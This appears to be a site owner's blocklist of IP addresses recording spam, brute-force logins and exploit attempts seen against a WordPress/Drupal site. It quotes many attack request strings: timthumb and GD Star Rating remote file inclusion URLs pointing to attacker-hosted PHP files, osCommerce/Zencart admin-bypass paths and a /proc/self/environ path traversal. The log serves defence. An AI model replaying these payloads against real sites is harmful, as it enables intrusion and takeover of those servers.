41.222.14.162 Company: Kenya – Nairobi Jamii Telecommunications Limited Mail Server, Comment Spammer / Dictionary Attacker
91.103.29.121 Hostname: gta.am
Company: Armenia – Yerevan Armenian Datacom Company
Comment Spammer / Mail Server
Direct lookup for /wp-comments-post.php
216.152.252.67 Hostname: unknown.xeex.net
Company: United States – Santa Monica Xeex
Trying to login/register on restricted site
/?q=user/register
93.174.93.145 Hostname: hosted-by.ecatel.net
Company: Netherlands – Den Haag Ecatel Ltd
Trying to login/register on restricted site
/?q=user/register
147.255.162.113 Hostname: 147.255.162.113.rdns.ubiquity.io
Company: United States – Phoenix Nobis Technology Group Phoenix
Trying to login/register on restricted site
/?q=user/register
209.0.51.37 Company: United States – Omaha Level 3 Communications Inc. Trying to login/register on restricted site
/?q=user/register
69.30.243.122 Hostname: mx4.lintpm.com
Company: United States – Kansas City Nick Koronzo
Malicious User Agent: curl/7.21.0 (x86_64-pc-linux-gnu) libcurl/7.21.0
OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.15 libssh2/1.2.6
195.228.100.195 Hostname: C3E464C3.ip.adsl.hu
Company: Hungary – Budapest Hungarian Telecom
Bad event – looking for plugin script. No referrer, no other URL accesed:
/wp-content/plugins/reflex-gallery/scripts/galleryManager.js
204.93.60.219 Company: United States – Torrance Giglinx Inc. Javascript Injection attack
123.151.148.200 Company: China – Beijing Haoweigaoke Ltd Unwanted bot:
Sosospider+(+http: //help.soso.com/webspider.htm)
194.135.105.55 Hostname: a55.nthosting.ru
Company: Russian Federation – Moscow Ooo Npo Relcom
Comment Spammer
209.250.3.186 Hostname: 209-250-3-186.convergentaz.net
Company: United States – Phoenix Convergent Internet Solutions
Trying to login/register on restricted site
/?q=user/register
211.115.89.131 Company: Korea, Republic Of – Seoul Gabia Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
198.144.116.15 Company: United States – Torrance Giglinx Inc. Comment Spammer
Javascript injection attack
Blocked by Firewall – subsequently banned
63.141.199.20 Company: United States – Torrance Giglinx Inc. Malicious User Agent: Java/1.7.0_09
Blocked by Firewall – subsequently banned
112.215.36.183 Company: Indonesia – Jakarta Pt Excelcomindo Pratama Script/injection attack:
/wp-content/uploads/2012/12/ads.xl.co.id/hp/ads.xl.co.id/hp/403.php
217.64.195.223 Hostname: w-03.th.seeweb.it
Company: Italy – Frosinone Seeweb S.r.l.
Timthumb exploiter
/wp-content/plugins/cms-pack/timthumb.php?src=http:
//picasa.com.oxybeauty.com/module.php
Blocked by .htaccess – subsequently banned
24.173.94.227 Hostname: 227.94.173.24.gvodatacenter.com
Company: United States – Plano Road Runner Holdco Llc
Banned User agents:
Mozilla/5.0 (compatible; AhrefsBot/3.1; +http: //ahrefs.com/robot/)
Mozilla/5.0 (compatible; Baiduspider/2.0; +http: //www.baidu.com/search/spider.html)
Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)
Also – NO USER AGENT
81.21.243.46 Hostname: 81-21-243-46.televork.ee
Company: Estonia – Tallinn Televorgu As
Looking for registration interfaces:
/author/george74@engineeringheadquarters.com
/author-panel
/submit-articles
/wp-login.php
93.91.195.203 Company: Iraq Erbil Newroz Telecom Ltd. Mail Server / Spammer
Looking for .txt files
63.141.199.187 Company: United States – Torrance Giglinx Inc. Malicious User Agent: Java/1.7.0_09
93.190.218.42t Company: Turkey – Bursa Rekare Bilgi Teknolojileri Ticaret Ve Sanayi Limited Sirketi Attempted WordPress GD Star Ratings plugin exploit:
//wp-content/gd-star-rating/?src=http%3A%2F%2Fwordpress.com.viawireless.
visaonet.com.br/onet.php
61.55.141.10 Company: China – Shijiazhuang China Unicom Hebei Province Network Comment Spammer:
Found Honeypot trap
64.121.4.75 Hostname: mail1.infradapt.com
Company: United States – Philadelphia Rcn Corporation
Mail Server / Dictionary Attacker
Crawled all plugin folders looking for .js and CSS files
BANNED
184.154.25.218 Hostname: mail.theinvestorrolodex.com
Company: United States – Chicago Singlehop Inc.
Malicious User Agent: libwww-perl/6.04
Chicage Singlehop again
61.147.82.178 Company: China – Nanjing Chinanet Jiangsu Province Network Comment Spammer
219.76.104.18 Hostname: yvcf04.netvigator.com
Company: Hong Kong – Hong Kong Pccw Limited
Comment Spammer
194.71.224.227 Company: Sweden – Stockholm Iehavoc Ab Trying to login/register on restricted site
/?q=user/register
208.177.72.206 Hostname: 208.177.72.206.ptr.us.xo.net
Company: United States – Herndon Xo Communications
Comment Spammer
195.19.204.151 Hostname: spios.nw.ru
Company: Russian Federation – Saint Petersburg Rokson Vo-router’s Network
File inclusion attempt – Blocked by Firewall
//plugins/filemanager/classes/CorePlugin.php
//eskipazari.com/bad.txt?
//eskipazari.com/images/products/large/ec.txt???
91.230.211.48 Company: Russian Federation – Krasnoyarsk Optizon Ltd. Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/wponlinestore-review/admin/categories.php/login.php?cPath=&action=new_product_preview
190.14.48.105 Hostname: host-190-14-48-105.iia.cl
Company: Chile – Santiago Ingenieria E Informatica Asociada Ltda
Trying to login/register on restricted site
/?q=user/register
193.243.171.237″ Company: Serbia – Belgrade Localhost D.o.o. Spam Harvester
Trying to login/register on restricted site
/?q=user/register
198.98.119.247 Hostname: 247.119-98-198.rdns.scalabledns.com
Company: United States – Henderson Enzu Inc
Attempting uploadify exploit
/files/uploadify/uploadify.php?
No User Agent or referrer
94.55.246.156 Company: Turkey Ankara Turksat Uydu Haberlesme Ve Kablo Tv Isletme A.s. Brute Force login attempt on WordPress
192.169.58.93 Hostname: tradingk.arvixevps.com
Company: United States – Santa Rosa Arvixe Llc
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
195.70.48.68 see next Hostname: tradingk.arvixevps.com
Company: Hungary – Debrecen Gts Hungary Tavkozlesi Ktf.
Attempted WordPress GD Star Ratings plugin exploit
//wp-content/gd-star-rating/?src=http: //blogger.com.indograndhosting.web.id/mini.php
67.19.64.18 Hostname: 12.40.1343.static.theplanet.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
192.210.50.60 Hostname: host.aerostarrinnovations.com
Company: United States – Walnut Psychz Networks
Dictionary Attacker / Comemt Spammer
Trying to access directories
31.24.40.128 Hostname: naire.hospedando.com
Company: Spain – Alicante Access Basic Server S.l.
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.phpRemote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http %3A%2F%2Fpicasa.com.m-2p.com/suntik.php
77.222.61.141 Hostname: vh25.sweb.ru
Company: Russian Federation – Moscow Garant-park-telecom Ltd.
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
15.193.49.4 Company: United States – Palo Alto Hewlett-packard Company Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
88.224.18.30 Hostname: 88.224.18.30.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Mail Server / Dictionary Attacker
Trying to login to WordPress
/wp-login.php
88.224.18.30 Hostname: 88.230.9.3.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Mail Server
Trying to login to WordPress
/wp-login.php
209.190.8.58 Hostname: s3.sdnt.net
Company: United States – Columbus Xlhost.com Inc
Showing either user agent:
SEOstats 2.0.9 https: //github.com/eyecatchup/SEOstats
or NO USER A: google.com
BANNED
213.251.135.16 Hostname: interstice.fr
Company: France Paris Ovh Sas
Attempting wpOnlineStore plugin / osCommerce exploit.
//admin/file_manager.php/login.php
218.108.169.108 Company: China – Hangzhou Wasu Bb Comment Spammer
found Honeypot Trap
192.74.240.97 Company: United States – Sunnyvale Peg Tech Inc Comment Spammer
174.120.161.34 Hostname: 22.a1.78ae.static.theplanet.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Script attack
/file.php?file[]=../../../../../../../../../../../../../../../proc/self
/environ%00/security/file.php?file[]=../../../../../../../../../../../
../../../../proc/self/environ%00
24.37.37.26 Hostname: modemcable026.37-37-24.static.videotron.ca
Company: Canada – Longueuil Videotron Ltee
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/categories.php/login.php?cPath=&action=new_product_preview
/admin/file_manager.php/login.php
[URL]/images/m32.php
93.182.139.88 Hostname: anon-139-88.vpn.ipredator.se
Company: Sweden – Lund Viaeuropa I Lund Ab
Trying to login/register on restricted site
/?q=user/register
65.52.0.0/14 MSNBOT
Company: United States – New York City Microsoft Corp
Rule Breaker – ignores robots.txt
excessive crawling, multiple simultaneous bots on site
More Information
208.89.210.244 Company: United States – Kansas City Dnsslave.com Spammer
Trying to register on restricted site: /?q=user/register
No referrer
199.101.102.27 Company: United States – Cincinnati Armada Media Llc Spammer
Trying to register on restricted site: /?q=user/register
No referrer
8.18.120.32 Company: United States – Omaha Level 3 Communications Inc. Tried to register on restricted site
/?q=user/register
23.19.72.231 Company: United States – Phoenix Nobis Technology Group Phoenix Comment Spammer
204.93.60.104 Company: United States – Torrance Giglinx Inc. Comment Spammer
210.129.193.152 Hostname: 210-129-193-152.jp-east-t1v.noahcloud.jp
Company: Japan – Tokyo Idc Frontier Inc.
Comment Spammer.
/wp-comments-post.php
No referrer – direct access attempt.
82.232.4.8 Hostname: cal69-1-82-232-4-8.fbx.proxad.net
Company: France – Paris Free Sas
Comment Spammer.
/wp-comments-post.php
No referrer – direct access attempt. Multiple attempts
82.59.142.38 Hostname: host38-142-dynamic.59-82-r.retail.telecomitalia.it
Company: Italy Roma Telecom Italia Net
Image Hotlinker
124.207.123.38 Company: China – Beijing Beijing Time-vision Telecommunication Dictionary Attacker
Suspected content scraper / feed embedder:
[URL]/?utm_source=rss&
80.247.161.74 Hostname: da04.easyhosting.nl
Company: Netherlands Winschoten Denit Internet Services
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
50.63.188.145 Hostname: ip-50-63-188-145.ip.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
163.125.245.58 Company: China – Guangzhou China Unicom Guangdong Province Network Attempted to force register and login:
[URL]/index.php?app=core&module=global&section=login
/ucp.php?mode=register
/index.php?page=en_Signup
/?do=/user/register/
/join_form.php
108.62.215.194 Hostname: 108.62.215.194.rdns.ubiquityservers.com
Company: United States Dallas Nobis Technology Group Llc
Comment Spammer
142.91.200.114 Hostname: 142.91.200.114.rdns.ubiquity.io
Company: United States Dallas Ubiquity Server Solutions Dallas
Trying to register on restricted site
74.221.220.31 Company: United States – Seattle Dme Hosting Llc Comment Spammer
Trying to register on restricted site
72.249.45.127 Hostname: server1.ratethatbrand.com
Company: United States – Saint Louis Colo4 Llc
UA: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
64.50.177.50 Hostname: f5.lunarvine.com
Company: United States – Washington Lunar Pages
Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
23.19.171.46 Hostname: 23.19.171.46.rdns.ubiquity.io
Company: United States – Seattle Ubiquity Server Solutions Seattle
Trying to register on restricted site
No referrer
216.152.252.51 Hostname: unknown.xeex.net
Company: United States – Santa Monica Xeex
Comment Spammer
Trying to register on restricted site
No referrer
174.136.32.3 Hostname: sierra.unisonplatform.com
Company: United States – Houston 180servers.com
Attempted timthumb exploit:
//wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php
61.183.248.222 Company: China – Beijing Chinanet Network In Wuhan City Hubei Province Comment Spammer:
107.6.134.130 Hostname: server.robosite.com
Company: United States Chicago Singlehop Inc.
Comment Spammer:
209.197.12.104 Company: United States – Layton Newshosting Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
200.160.238.201 Company: Brazil – Sao Paulo Brasil Telecom S/a – Filial Distrito Federal Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
15.217.50.4 Hostname: v31687.1blu.de
Company: Germany Berlin 1blu Web Hosting Frankfurt
Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
88.84.151.187 Company: United States – Palo Alto Hewlett-packard Company Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
202.98.198.100 Company: China – Guiyang Chinanet Guizhou Province Network Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
41.35.157.73 Hostname: host-41.35.157.73.tedata.net
Company: Egypt – Al Jizah Te Data
Trying to login to restricted site
/wp-login.php
198.27.78.140 Company: United States – Newark Ovh Comment Spammer
Found Honeypot Trap file
93.182.174.161 Hostname: anon-174-161.vpn.ipredator.se
Company: Sweden – Lund Viaeuropa I Lund Ab
Comment Spammer / Trackback Spammer
203.41.243.240 Company: Australia – Canberra Telstra Internet Crawling for non existent URLS:
/forum/
/ipb/
/oscommerce/
87.253.162.9 Hostname: server9.configcenter.info
Company: Germany – Ahrensburg Media:webline Internet Solutions Gmbh
Attempting osCommerce/ZenCart exploit.
/admin/categories.php/login.php?cPath=&action=new_product_preview
121.33.4.174 Company: China – Guangzhou Chinanet Guangdong Province Network Spidering site – mainly looking for RSS feeds and forms.
Never read robots.txt
No referrer
151.21.68.169 Hostname: ppp-169-68.21-151.libero.it
Company: Italy – Milano Wind Telecomunicazioni S.p.a
Mail Server / Comment Spammer
198.154.62.175 Company: United States – Miami Fortatrust Usa Corporation Attempting WordPress GD Star Rating plugin exploit:
http: //wp-content/gd-star-rating/?src=http: //img.youtube.com.toptutor.hk/upload.php
/!tum?src=http: //blogger.com.nilgirisrealty.com/link.php
184.168.152.193 Hostname: p3nlhftpg091.shr.prod.phx3.secureserver.net
Company: United States – Fort Worth Godaddy.com Llc
Attempted timthumb exploit:
/wp-content/plugins/christmas/timthumb/timthumb.php?src=http%3A%2F%2Fflickr.com.deliz.co.uk%2Fbad.php
103.21.208.46 Company: China – Kaifeng Kaifeng Guochao E-commerce Co.ltd. Comment Spammer
Found Honeypot Trap file
23.19.171.115 Hostname: 23.19.171.115.rdns.ubiquity.io
Company: United States – Seattle Ubiquity Server Solutions Seattle
Trying to login/register on restricted site
/?q=user/register
67.202.122.68 Hostname: ip68.67-202-122.static.steadfastdns.net
Company: United States – Chicago Steadfast Networks
Trying to login/register on restricted site
/?q=user/register
23.19.72.8 Company: United States – Phoenix Nobis Technology Group Phoenix Trying to login/register on restricted site
/?q=user/register
121.62.159.224 Company: China – Wuhan Chinanet Hubei Province Network Trying to login/register on restricted site
/?q=user/register
173.199.115.35 Hostname: 173.199.115.35.choopa.net
Company: United States – Piscataway Ahrefs Inc.
UA: Mozilla/5.0 (compatible; AhrefsBot/4.0; +http: //ahrefs.com/robot/)
AHREFS Bot
74.221.215.118 Company: United States – Seattle Dme Hosting Llc Trying to login/register on restricted site
/?q=user/register
93.182.169.172 Hostname: anon-169-172.vpn.ipredator.se
Company: Sweden – Jamshog Viaeuropa I Lund Ab
Comment Spammer:
Trying to login/register on restricted site
/?q=user/register
93.182.139.81 Hostname: anon-139-83.vpn.ipredator.se
Company: Sweden – Jamshog Viaeuropa I Lund Ab
Trying to login/register on restricted site
/?q=user/register
199.47.209.146 Company: New York City Vegasnap Llc Trying to login/register on restricted site
/?q=user/register
91.240.8.66 Hostname: cpanel.netveillance.net
Company: Romania Cluj-napoca Sc Netveillance Srl
Attempted osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
85.158.248.65 Hostname: srv11028.hostingserver.nl
Company: Netherlands – Zwolle It-ernity Internet Services Bv
Remote file inclusion attack
http: //myghost.myqr.sg/bbs/logs/bad.txt?
http: //admin/actions/del.php?include_path=http: //myghost.myqr.sg/bbs/logs/rabot.txt???
203.128.80.62 Hostname: ip-80-62.neuviz.net.id
Company: Indonesia – Denpasar Jl. Hayam Wuruk No.1 Rst
Spam Harvster / Mail Server
UAL Mozilla/5.0 (compatible; 008/0.85; http: //www.80legs.com/webcrawler.html)
Gecko/2008032620
84.240.247.6 Company: Kazakhstan – Almaty Digital Tv Llp Rogue bot:
Mozilla/5.0 (compatible; 008/0.85; http: //www.80legs.com/webcrawler.html)
Gecko/2008032620
84.22.143.113 Hostname: ekon.g-service.ru
Company: Russian Federation – Krasnoyarsk Company Skala Ltd
Rogue bot:
Mozilla/5.0 (compatible; 008/0.85; http: //www.80legs.com/webcrawler.html)
Gecko/2008032620
195.218.225.178 Hostname: 178.225.218.195.static.sovintel.ru
Company: Russian Federation – Moscow Ojsc Vimpelcom
Rogue bot: Mozilla/5.0 (compatible; 008/0.85; http: //www.80legs.com/webcrawler.html)
Gecko/2008032620
88.135.63.154 Company: Russian Federation – Smolensk Man Network Ltd Mail Server / Dictionary Attacker
Rogue bot:
Mozilla/5.0 (compatible; 008/0.85; http: //www.80legs.com/webcrawler.html)
Gecko/2008032620
23.19.216.203 Company: United States Seattle Ubiquity Server Solutions Seattle Comment Spammer
72.52.248.227 Hostname: host.webimpakt.com
Company: United States – Little Rock Liquid Web Inc.
Attempting osCommerce/ZenCart exploit.
admin/categories.php/login.php
admin/file_manager.php/login.php
admin/banner_manager.php/login.php
36.248.124.192 Company: China – Beijing Fuzhou City Fujian Provincial Network Of Unicom Comment Spammer
173.203.189.67 Company: United States – San Antonio Rackspace Hosting Attempted timthumb exploit:
/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=http
%3A%2F%2Fflickr.com.sistegraphic.com%2Fbad.php
59.60.127.49 Hostname: 49.127.60.59.broad.pt.fj.dynamic.163data.com.cn
Company: China – Fuzhou Chinanet Fujian Province Network
Comment Spammer
50.87.63.70 Hostname: 50-87-63-70.unifiedlayer.com Attempted WordPress GD Star Rating plugin / timthumb exploit:
/wp-content/gd-star-rating/timthumb.php?src=http
%3A%2F%2Fflickr.com.deliz.co.uk%2Fbad.php
83.21.90.206 Hostname: eha206.neoplus.adsl.tpnet.pl
Company: Poland Warsaw Telekomunikacja Polska S.a.
Trying to access admin and register.
/admin.php
/wp-login.php?action=register
50.97.138.101 Hostname: swine.arvixe.com
Company: United States – Dallas Softlayer Technologies Inc.
Attempted timthumb exploit:
/wp-content/plugins/cms-pack/timthumb.php?src=http
%3A%2F%2Fflickr.com.deliz.co.uk%2Fbad.php
88.231.168.217 Hostname: 88.231.168.217.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Dictionary Attacker and Mail Server
Attempting to login to site. No Referrer
83.8.206.11 Hostname: abvi11.neoplus.adsl.tpnet.pl
Company: Poland Warsaw Telekomunikacja Polska S.a.
Mail Server
Trying to access site admin:
/wp-login.php?registration=disabled
/admin/
/choosepack.html
/add
83.8.199.132 Hostname: abvb132.neoplus.adsl.tpnet.pl
Company: Poland Warsaw Telekomunikacja Polska S.a.
Mail Server
Trying to access site admin:
/wp-login.php?registration=disabled
/admin/
/choosepack.html
/add
199.19.110.150 Company: United States – Scranton Leyton Reed Comment Spammer
108.171.248.27 Hostname: unassigned.psychz.net
Company: United States – New York City Psychz Networks
Comment Spammer
42.62.5.109 Company: China – Beijing Forest Eternal Communication Tech. Co.ltd Comment Spammer
Tried to login to site
107.6.134.130 Hostname: server.robosite.com
Company: United States Chicago Singlehop Inc.
Comment Spammer
209.249.53.149 User Agent: Mozilla/5.0 http: //fairshare.cc (X11; U; FreeBSD i386; en-US; rv:1.2a) Gecko/20021021 Suspicious spider – identitfied as guest not as bot –
70.39.149.206 vps7404.inmotionhosting.com – UA: libwww-perl/6.04 Attempting wpOnlineStore plugin / osCommerce exploit.
212.90.148.29 w69.goneo.de Attempting wpOnlineStore plugin / osCommerce exploit.
69.142.162.67 c-69-142-162-67.hsd1.pa.comcast.net Spammer – Attempting to register user account – no login links, no user acounts on site
195.114.19.215 195-114-19-215.ispfr.net Attempting wpOnlineStore plugin / osCommerce exploit.
96.31.92.131 UA: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 Looking for timthumb exploit
91.236.74.254 UA: Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.64 Comment spammer – tries to access my honeypot trap file daily –
even though banned for over 6 months
91.121.144.127 Host: ns356994.ovh.net Registrar: France Roubaix Ovh Sas Ovh Hosting is banned – there’s nothing good coming form any of their IP’s
209.225.111.190 Host: colo-dhcp-190.wi.net Attempting GD Star Ratings plugin exploit
unknown.scnet.net Bad Host – apparently used only by spambots and hacker bots – banned by hostname in .htaccess
189.1.174.0/24 Host: cloud.grupomegabr.com.br Registrar: Brazil Sao Paulo Hostlocation Ltda Attempting GD Star Ratings plugin exploit. Undesirable Country – BRAZIL – IP range banned
100.43.83.135 Host: spider- 100-43-83-135.yandex.com UA: Mozilla/5.0 (compatible; YandexBot/3.0; +http: //yandex.com/bots)
Hosting Company: United States Palo Alto Yandex Inc
Yandex – Russian Search engine – spider. Yandex bot is totally banned.
Rule breaker – ignore robots.txt completely.
Undesirable Country – RUSSIA
93.182.154.47 Host: anon-154-47.relakks.com Comment Spammer. daily attempts to spam even though has been banned since 03/2012.
213.55.107.59 Ethiopia – Addis Ababa Distributed Nat For Ngn Comment Spammer
129.121.186.120 Host: ip-129-121-186-120.local Brute force exploit attempt on GD Star Ratings plugin
199.30.94.114 Host: ispconf3.esonicspider.com UA: libwww-perl/5.805 Attempting timthumb exploit – returns often
207.44.149.66 Host: xeon.intonet-technology.co.uk
UA: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6
Attempting WordPress timthumb exploit
98.142.210.82 Host: atlanta.sceneserver.com
UA: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Attempting WordPress timthumb exploit
65.61.204.40 Host: hosting.innovationnetworks.com Attempting WordPress timthumb exploit
192.31.21.179 Host: integromedb-crawler.sdsc.edu Nuisance spider, rule breaker, no value.
120.34.84.9 UA: Opera/9.80 (Windows NT 6.1; WOW64; U; Edition Yx; ru) Presto/2.10.289 Version/12.00 Known comment spammer
116.120.96.132 Mail server.
UA: Mozilla/5.0(SymbianOS/9.2; U; Series60/3.1 NokiaN82/10.0.035; Profile/MIDP-2.0 Configuration/CLDC-1.1;) AppleWebKit/413(KHTML,like Gecko)Safari/413
Attempted DDOS attack on site
39.47.186.112 mail server Banned for hotlinking
192.204.198.201 Blocked by security system for trying to access wp-login.php
82.98.144.53 Host: hl37.dinaserver.com Banned for suspected script attack
67.212.166.98 Host: ns1.hotspotreviewcamera.com Comment Spammer – caught by honeypot trap
91.121.138.13 Host: ks355785.kimsufi.com (Another bad France Roubaix Ovh Sas IP) Persistent timthumb script attacks – returns daily – Banned since June 2012
91.121.60.213 Host: 91-121-60-213.kimsufi.com
France Roubaix Ovh Sas
Trying to post to Drupal
/?q=user/&destination=node/add
69.64.46.108 Host: dragon896.startdedicated.com Banned for Hotlinking and plagiarism
69.28.149.29 Mail Server
Host: dagmar.corp.linkedin.com
UA: Java/1.6.0_27
Banned for suspicious activity.
91.212.74.5</td=0%EA Host: amber.bunthosting.ro
Full IP range 91.212.74.0 – 91.212.74.255
BANNED
Attempting “Is-human WordPress Plugin Remote Command Execution Vulnerability
66.209.67.142 Las Vegas Macminicolo.net Llc Attempted WordPress GD Star Ratings exploit.
Attempted TimThumb Exploit
208.177.72.206 Host: 208.177.72.206.ptr.us.xo.net Comment Spammer
184.172.156.228 184.172.156.228-static.reverse.softlayer.com Provide DNS service for the attacks of wordpress.com.cicadex.com.
186.101.50.2 Host: host-186-101-50-2.telconet.net Comment spammer
50.63.157.213 Hostname: ip-50-63-157-213.ip.secureserver.net. GoDaddy Hosting Looking for server / PHP injection vulnerability exploit – http:
///?_SERVER[DOCUMENT_ROOT]
FAKE USER AGENT: Mozilla/5.0 (compatible;bingbot/2.0;+http: //www.bing.com/bingbot.htm)
213.232.0.82 Hostname: im01.ada.net.trThis host is suspicious and will be monitorred for other BAD IPs Exploit attempt on WordPress GD Star Rating plugin e.g. http:
//wp-content/gd-star-rating/?src=http: //img.youtube.com.toptutor.hk/upload.php
200.98.203.73 Hostname: 200-98-175-199.clouduol.com.br
Another BAD Brazil IP – Brazil Sao Paulo Universo Online S.a.
Attempting WordPress GD Star Rating exploithttp: //wp-content/gd-star-rating/?src=http:
//wordpress.com.cicadex.com/mct.php
5.9.125.26 User-Agent: Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
Hostname: 5-9-125-26.crawler.sistrix.net
Another Hetzner Online Ag BAD IP
Undesireable spider.
Rule Breaker, Possible Spybot
No Value – no traffic will ever come from this spider
83.45.100.76 Hostname: 76.Red-83-45-100.dynamicIP.rima-tde.net
UA: Java/1.6.0_23
Nuisance spider
199.195.214.37 Hosting Company: Chicago Fortatrust Usa Corporation (United States) Attempting WordPress timthumb exploit/wp-content/plugins/cms-pack/timthumb.php.cache/6da88008e6ddc64bf769a895581f90ba.php
31.3.234.170 Hostname: h31-3-234-170.host.redstation.co.uk.Redstation hosting is totally banned Prolific Comment Spammer.
Attempting wp-signup.
110.82.161.68 see next Registrar: China Fuzhou Chinanet Fujian Province Network Comment Spammer
82.98.136.8 Host: hl38.dinaserver.com
Hosting Company: Spain – A Coruna Dinahosting S.l.
Attempting WordPress GD Star Ratings exploit:
//wp-content/gd-star-rating/?src=http: //img.youtube.com.alojandome.com/brot.php
213.186.127.9 see next Hostname: 213.186.127.9.utel.net.ua
UA: Mozilla/5.0 (compatible; AhrefsBot/3.0; +http: //ahrefs.com/robot/)
Spybot. Ahrefs BANNED on sight.
204.110.9.190 Banned for timthumb exploit attempts
wp-content/themes/LondonLive/thumb.php?src=http: //picasa.com.flexihostings.co.nz/index2.php
76.73.5.2 Hostname: server2.up4.net
UA: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Attempting timthumb exploit
//wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=http:
//blogger.com.arztree.com/idss.php
199.19.109.246 Hosting Company: United States Scranton Volumedrive Comment Spammer
196.14.75.106 Hosting Company: South Africa – Kempton Park Internet Solutions Mail server
Dictionary attacker
75.98.169.231 Hostname: 75.98.169.231.static.a2webhosting.com
Mail server
Attempting WordPress GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=http: //flickr.com.colortemplates.in/bad.php
91.235.237.17 Hostname: app1.aduana.gov.py Hacker: Attempting code injection:
/page.php?url=http: //leonardfamilyvalues.com/Assets/t.gif?%0D?
31.25.177.11 Hosting Company: Spain Madrid Free Technologies Excom S.l. Attempted osCommerce/wpOnlineStore exploit:
/admin/banner_manager.php/login.php
184.82.92.86 Hostname: service.productservicestuv.com
United States Chandler Dme Hosting Llc
Banned for trying to login to WordPress
69.49.99.106 Hostname: web106c10.megawebservers.com
Company: United States – Great Lakes Internetnamesforbusiness.com
UA: libwww-perl/5.835
Brute Force attempt at osCommerce/wpOnlineStore/Zencart exploit:
/admin/file_manager.php/login.phpLooking for xmlrpc.xml
142.91.13.242 Hostname: 142.91.13.242.rdns.ubiquity.io Trackback Spammer
65.60.11.138 Hostname: node1.rampragefiref.org
Another Chicago Singlehop Inc. Bad IP
Comment Spammer:
Found Honeypot Trap file
184.154.12.138 Hostname: bu004.buyurl.net
Another Chicago Singlehop Inc. Bad IP
Comment Spammer. Attempted to create user account.
189.254.102.164 Hostname: customer-189-254-102-164-sta.uninet-ide.com.mx Attempting WordPress GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=http: //photobucket.com.clasek.de/iam.php
173.242.124.59 Iran, Islamic Republic Of Tehran Volumedrive Tried to register account on restricted Drupal site
142.91.176.35 Hostname: 142.91.176.35.rdns.ubiquity.io
United States – Dallas Ubiquity Server Solutions Dallas
Tried to register account on restricted Drupal site
69.175.86.202 Hostname: node2.exceptthepage.org
Another Singlehop Bad IP
Tried to register user account on restricted Drupal site
194.247.30.126 Hostname: hosted-by.deziweb.com
Netherlands Meppel Deziweb
Hacker: Attempting WordPress timtumb exploit:
/wp-content/themes/overeasy/thumb.php?src=http: //wordpress.com.oinotropia.gr/dm.php
198.15.124.76 United States – Phoenix Secured Servers Llc Comment spammer
198.15.124.77 United States – Phoenix Secured Servers Llc Comment spammer
72.233.77.178 Hostname: 178.77.233.72.static.reverse.ltdomains.com
United States – Kansas City Layered Technologies Inc.
Attempting WordPress GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=http: //picasa.com.copiinet.ro/wordpress.php
193.254.241.12 Hostname: wmge7c.artinuove.itItaly Roma – Widestore S.r.l. Attempting osCommerce/wpOnlineStore/Zencart exploit:
/admin/file_manager.php/login.php
93.182.157.17 Hostname: anon-157-17.relakks.com Comment Spammer
93.182.130.179 Hostname: anon-130-179.relakks.com Comment Spammer
87.205.0.169 Hostname: 87-205-0-169.ip.netia.com.pl
Hosting Company: Poland – Netia Sa
Attemptiong WordPRess GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=http:
//picasa.com.smpunggulanalfalahpanji.sch.id/id/injekan.php
91.236.74.16 Ukraine – Hurzuf Przedsiebiorstwo Uslug Specjalistycznych Elan Mgr Inz. Andrzej Niechcial Trying to register on Drupal site
